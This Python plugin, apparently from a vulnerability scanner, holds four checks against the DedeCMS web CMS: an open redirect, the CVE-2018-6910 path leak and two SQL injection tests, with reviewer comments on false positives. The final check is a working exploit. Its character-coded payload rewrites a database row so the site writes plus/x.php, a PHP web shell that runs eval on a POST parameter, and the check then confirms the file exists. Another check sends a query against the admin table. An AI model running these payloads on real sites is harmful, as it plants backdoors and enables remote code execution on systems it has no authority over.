#!/usr/bin/env python
from plugins.config.config_package import *


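class DedeCMS(object):
    """Checks for known DedeCMS weaknesses.

    Each check takes the target base URL, sends one or two HTTP requests and
    calls ``core.checksuc`` when the response matches its indicator. Nothing
    is returned. ``core``, ``requests`` and ``sys`` are expected to be provided
    by the star import at the top of the file.

    NOTE(review): the methods take ``url`` as their only parameter (no
    ``self``), so they are presumably invoked on the class itself, e.g.
    ``DedeCMS.check_CVE_2018_6910(url)`` - confirm against the caller.
    NOTE(review): the two ``requests``-based checks concatenate ``url`` and
    the path directly, so ``url`` is assumed to end with ``/`` - confirm.
    """

    def dedecms_url_redirection(url):
        """Probe ``plus/download.php`` for an open redirect.

        The ``link`` value is the Base64 form of ``http://www.baidu.com``.
        The check reports when the response status is 200 and its body
        contains ``baidu.com``.

        NOTE(review): a body match alone also fires on pages that merely echo
        the link or already reference baidu.com; if ``core.get`` can return
        the un-followed response, comparing its ``Location`` header would be a
        tighter indicator.
        """
        path = 'plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D'
        res = core.get(url, path)
        if res.status_code == 200 and 'baidu.com' in res.text:
            core.checksuc(target=url, name='DedeCMS URL重定向', payload=path)

    def check_CVE_2018_6910(url):
        """Probe ``include/downmix.inc.php`` for the CVE-2018-6910 path leak.

        The check reports when the response status is 200 and the body
        contains ``/www/wwwroot/``. Installations whose disclosed path lies
        under a different document root are therefore not detected.
        """
        path = 'include/downmix.inc.php'
        res = core.get(url, path)
        if res.status_code == 200 and '/www/wwwroot/' in res.text:
            core.checksuc(target=url, name='CVE-2018-6910 DedeCMS信息泄露', payload=path)

    def advancedsearch_sqli(url):
        """Probe ``plus/advancedsearch.php`` for SQL accepted via ``sql``.

        The check reports when the response status is 200 and the body
        contains ``admin``. Request errors are swallowed so one bad target
        does not stop a scan; Ctrl-C exits the process.

        NOTE(review): the word ``admin`` appears on many unrelated pages (for
        example a login link), so a hit should be confirmed manually before it
        is reported as SQL injection.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin"
        try:
            # verify=False: certificate validation is off, so the response is
            # not authenticated; treat findings accordingly.
            res = requests.get(url + payload, headers=headers, verify=False, timeout=2)
            # ``text`` is a property on a requests response. Calling it raised
            # TypeError, which the handler below swallowed, so this check
            # could never report a finding.
            if res.status_code == 200 and "admin" in res.text:
                core.checksuc(target=url, name='advancedsearch_sqli', payload=payload)
        except KeyboardInterrupt:
            sys.exit()
        except Exception:
            # Best effort: an unreachable or misbehaving target is skipped.
            pass

    def dedesql_class_sqli(url):
        """Test the ``arrs1``/``arrs2`` injection in ``plus/download.php``.

        Sends the request, then fetches ``plus/x.php`` and reports when both
        responses have status 200. Request errors are swallowed; Ctrl-C exits
        the process.

        NOTE(review): this is a state-changing test, not a read-only probe.
        The character codes in ``arrs1``/``arrs2`` decode to a SQL fragment
        that rewrites a template-tag row so that the CMS creates
        ``plus/x.php``. After a positive result the target holds a modified
        database row and an executable PHP file; both have to be reverted and
        listed in the finding.
        NOTE(review): a 200 for ``plus/x.php`` is also returned by sites that
        answer 200 for unknown paths, or where the file existed beforehand, so
        the indicator can produce false positives.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = 'plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1['\
            ']=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]'\
            '=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]'\
            '=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&a'\
            'rrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&a'\
            'rrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2'\
            '[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2'\
            '[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2'\
            '[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2['\
            ']=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]='\
            '120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44'\
            '&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&ar'\
            'rs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2'\
            '[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93'\
            '&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2'\
            '[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2['\
            ']=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]='\
            '87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arr'\
            's2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]'\
            '=35'
        try:
            res = requests.get(url + payload, headers=headers, verify=False, timeout=2)
            if res.status_code == 200:
                # Same TLS and timeout settings as the first request. Without
                # them this call failed on hosts the first request had
                # accepted (self-signed certificates) and could block forever
                # on a silent peer.
                msql = requests.get(url=url + '/plus/x.php', headers=headers,
                                    verify=False, timeout=2)
                if msql.status_code == 200:
                    core.checksuc(target=url, name='dedesql_class_sqli', payload=None)
        except KeyboardInterrupt:
            sys.exit()
        except Exception:
            # Best effort: an unreachable or misbehaving target is skipped.
            pass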